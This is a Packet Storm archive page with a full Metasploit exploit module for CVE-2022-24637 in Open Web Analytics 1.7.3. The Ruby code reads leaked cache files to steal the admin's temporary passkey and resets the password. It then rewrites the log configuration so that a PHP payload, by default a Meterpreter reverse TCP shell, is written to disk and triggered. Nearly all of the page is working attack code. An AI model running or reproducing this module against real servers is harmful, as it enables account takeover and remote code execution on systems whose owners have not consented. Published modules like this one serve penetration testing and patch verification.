exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

Open Web Analytics 1.7.3 Remote Code Execution

Open Web Analytics 1.7.3 Remote Code Execution
Posted Mar 17, 2023
Authored by Jacob Ebben, Dennis Pfleger | Site metasploit.com

Open Web Analytics (OWA) versions prior to 1.7.4 allow an unauthenticated remote attacker to obtain sensitive user information, which can be used to gain admin privileges by leveraging cache hashes.

tags | exploit, remote, web
advisories | CVE-2022-24637
SHA-256 | f257222aebae82bd8174357b1116bd0d590938b4d5b592db27830a87036b04c1

Open Web Analytics 1.7.3 Remote Code Execution

Change Mirror Download
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking

include Msf::Exploit::FileDropper
include Msf::Exploit::Remote::HttpClient
prepend Msf::Exploit::Remote::AutoCheck

def initialize(info = {})
super(
update_info(
info,
'Name' => 'Open Web Analytics 1.7.3 - Remote Code Execution (RCE)',
'Description' => %q{
Open Web Analytics (OWA) before 1.7.4 allows an unauthenticated remote attacker to obtain sensitive
user information, which can be used to gain admin privileges by leveraging cache hashes.
This occurs because files generated with '<?php (instead of the intended "<?php sequence) aren't handled
by the PHP interpreter.
},
'Author' => [
'Jacob Ebben', # ExploitDB Exploit Author
'Dennis Pfleger' # Msf Module
],
'References' => [
[ 'CVE', '2022-24637'],
[ 'EDB', '51026'],
[ 'URL', 'https://devel0pment.de/?p=2494' ]
],
'Licence' => MSF_LICENSE,
'Platform' => ['php'],
'DefaultOptions' => {
'PAYLOAD' => 'php/meterpreter/reverse_tcp'
},
'Targets' => [ ['Automatic', {}] ],
'DisclosureDate' => '2022-03-18',
'DefaultTarget' => 0,
'Notes' => {
'Stability' => [CRASH_SAFE],
'Reliability' => [REPEATABLE_SESSION],
'SideEffects' => [
ARTIFACTS_ON_DISK, # /owa-data/caches/{get_random_string(8)}.php
IOC_IN_LOGS, # Malicious GET/POST requests in the webservice logs
ACCOUNT_LOCKOUTS, # Account passwords will be changed in this module
CONFIG_CHANGES, # Will update config files to trigger the exploit
]
}
)
)

register_options([
OptString.new('Username', [ true, 'Target username', 'admin' ]),
OptString.new('Password', [ true, 'Target new password', 'pwned' ]),
])

register_advanced_options([
OptInt.new('SearchLimit', [ false, 'Upper limit of user ids to check for usable cache file', 100 ]),
OptBool.new('DefangedMode', [ true, 'Run in defanged mode', true ])
])
end

def check
res = check_connection
return CheckCode::Unknown('Connection failed') unless res
return CheckCode::Safe if !res.body.include?('Open Web Analytics')

version = Rex::Version.new(res.body.scan(/version=([\d.]+)/).flatten.first)
return CheckCode::Detected("Open Web Analytics #{version} detected") unless version < Rex::Version.new('1.7.4')

CheckCode::Appears("Open Web Analytics #{version} is vulnerable")
end

def exploit
if datastore['DefangedMode']
warning = <<~EOF


Are you SURE you want to execute the exploit against the target system?
Running this exploit will change user passwords and config files of the
target system.

Disable the DefangedMode option if you have authorization to proceed.
EOF

fail_with(Failure::BadConfig, warning)
end

username = datastore['Username']
new_password = datastore['Password']

res = check_connection
if res
print_good("Connected to #{full_uri} successfully!")
end

res = send_request_cgi(
'method' => 'POST',
'uri' => normalize_uri(target_uri.path, '/index.php?owa_do=base.loginForm'),
'keep_cookies' => true,
'vars_post' => {
'owa_user_id' => username,
'owa_password' => rand_text_alphanumeric(8),
'owa_action' => 'base.login'
}
)
if res && res.code != 200
fail_with(Failure::UnexpectedReply, 'An error occurred during the login attempt!')
end

print_status("Attempting to find cache of '#{username}' user")

found = false
cache = nil

limit = datastore['SearchLimit']
if limit < 0
fail_with(Failure::BadConfig, 'SearchLimit must be set to a number > 0!')
end

limit.times do |key|
user_id = "user_id#{key}"
userid_hash = Digest::MD5.hexdigest(user_id)
filename = "#{userid_hash}.php"
cache_request = send_request_cgi(
'method' => 'GET',
'uri' => normalize_uri(target_uri.path, "/owa-data/caches/#{key}/owa_user/#{filename}")
)
if cache_request && cache_request.code == 404
next
end

cache_raw = cache_request.body
cache = get_cache_content(cache_raw)
cache_username = get_cache_username(cache)
if cache_username != username
print_status("The temporary password for a different user was found. \"#{cache_username}\": #{get_cache_temppass(cache)}")
next
else
found = true
break
end
end

if !found
fail_with(Failure::NotFound, "No cache found. Are you sure \"#{username}\" is a valid user?")
end

cache_temppass = get_cache_temppass(cache)
print_good("Found temporary password for user '#{username}': #{cache_temppass}")

res = send_request_cgi(
'method' => 'POST',
'uri' => normalize_uri(target_uri.path, '/index.php?owa_do=base.usersPasswordEntry'),
'keep_cookies' => true,
'vars_post' => {
'owa_password' => new_password,
'owa_password2' => new_password,
'owa_k' => cache_temppass,
'owa_action' => 'base.usersChangePassword'
}
)

if res && res.code != 302
fail_with(Failure::UnexpectedReply, 'An error occurred when changing the user password!')
end
print_good("Changed the password of '#{username}' to '#{new_password}'")

res = send_request_cgi(
'method' => 'POST',
'uri' => normalize_uri(target_uri.path, '/index.php?owa_do=base.loginForm'),
'keep_cookies' => true,
'vars_post' => {
'owa_user_id' => username,
'owa_password' => new_password,
'owa_action' => 'base.login'
}
)

redirect = res['location']
res = send_request_cgi(
'method' => 'GET',
'uri' => URI(redirect).path
)
if res && res.code == 200
print_good("Logged in as #{username} user")
else
fail_with(Failure::UnexpectedReply, "An error occurred during the login attempt of user #{username}")
end

res = send_request_cgi(
'method' => 'GET',
'uri' => normalize_uri(target_uri.path, '/index.php?owa_do=base.optionsGeneral')
)

shell_filename = "#{rand_text_alphanumeric(8)}.php"

nonce = get_update_nonce(res)
log_location = 'owa-data/caches/' + shell_filename
register_file_for_cleanup(shell_filename)

res = send_request_cgi(
'method' => 'POST',
'uri' => normalize_uri(target_uri.path, '/index.php?owa_do=base.optionsGeneral'),
'keep_cookies' => true,
'vars_post' => {
'owa_nonce' => nonce,
'owa_action' => 'base.optionsUpdate',
'owa_config[base.error_log_file]' => log_location,
'owa_config[base.error_log_level]' => 2
}
)
fail_with(Failure::Unreachable, 'An error occurred when attempting to update config!') unless res && res.code == 302
print_status('Creating log file')

res = send_request_cgi(
'method' => 'POST',
'uri' => normalize_uri(target_uri.path, '/index.php?owa_do=base.optionsGeneral'),
'keep_cookies' => true,
'vars_post' => {
'owa_nonce' => nonce,
'owa_action' => 'base.optionsUpdate',
'owa_config[shell]' => payload.encoded + '?>'
}
)
fail_with(Failure::Unknown, 'An error occurred when attempting to update config!') unless res && res.code == 302
print_good('Wrote payload to file')

send_request_cgi(
'method' => 'GET',
'uri' => normalize_uri(target_uri.path, "/owa-data/caches/#{shell_filename}"),
timeout: 1
)

print_good('Triggering payload! Check your listener!')
end

def check_connection
send_request_cgi(
'method' => 'GET',
'uri' => normalize_uri(target_uri.path, '/index.php?owa_do=base.loginForm')
)
end

def get_cache_content(cache_raw)
regex_cache_base64 = /\*(\w*={0,2})/
regex_result = cache_raw.match(regex_cache_base64)

unless regex_result
fail_with(Failure::NotVulnerable, 'The serialized data can not be extracted from the cache file!')
end

Base64.decode64(regex_result[1]).force_encoding('ascii')
end

def get_cache_username(cache)
match = cache.match(/"user_id";O:12:"owa_dbColumn":11:{s:4:"name";N;s:5:"value";s:5:"(\w*)"/)

unless match
fail_with(Failure::NotVulnerable, 'The username can not be extracted from the cache file!')
end

match[1]
end

def get_cache_temppass(cache)
match = cache.match(/"temp_passkey";O:12:"owa_dbColumn":11:{s:4:"name";N;s:5:"value";s:32:"(\w*)"/)

unless match
fail_with(Failure::NotVulnerable, 'The temp_passkey variable can not be extracted from the cache file!')
end

match[1]
end

def get_update_nonce(page)
update_nonce = page.body.match(/owa_nonce" value="(\w*)"/)[1]

unless update_nonce
fail_with(Failure::NotVulnerable, 'The update_nonce variable can not be extracted from the page body!')
end

update_nonce
end
end
Login or Register to add favorites

File Archive:

September 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Sep 1st
    261 Files
  • 2
    Sep 2nd
    17 Files
  • 3
    Sep 3rd
    38 Files
  • 4
    Sep 4th
    52 Files
  • 5
    Sep 5th
    23 Files
  • 6
    Sep 6th
    27 Files
  • 7
    Sep 7th
    0 Files
  • 8
    Sep 8th
    1 Files
  • 9
    Sep 9th
    16 Files
  • 10
    Sep 10th
    38 Files
  • 11
    Sep 11th
    21 Files
  • 12
    Sep 12th
    40 Files
  • 13
    Sep 13th
    18 Files
  • 14
    Sep 14th
    0 Files
  • 15
    Sep 15th
    0 Files
  • 16
    Sep 16th
    0 Files
  • 17
    Sep 17th
    0 Files
  • 18
    Sep 18th
    0 Files
  • 19
    Sep 19th
    0 Files
  • 20
    Sep 20th
    0 Files
  • 21
    Sep 21st
    0 Files
  • 22
    Sep 22nd
    0 Files
  • 23
    Sep 23rd
    0 Files
  • 24
    Sep 24th
    0 Files
  • 25
    Sep 25th
    0 Files
  • 26
    Sep 26th
    0 Files
  • 27
    Sep 27th
    0 Files
  • 28
    Sep 28th
    0 Files
  • 29
    Sep 29th
    0 Files
  • 30
    Sep 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close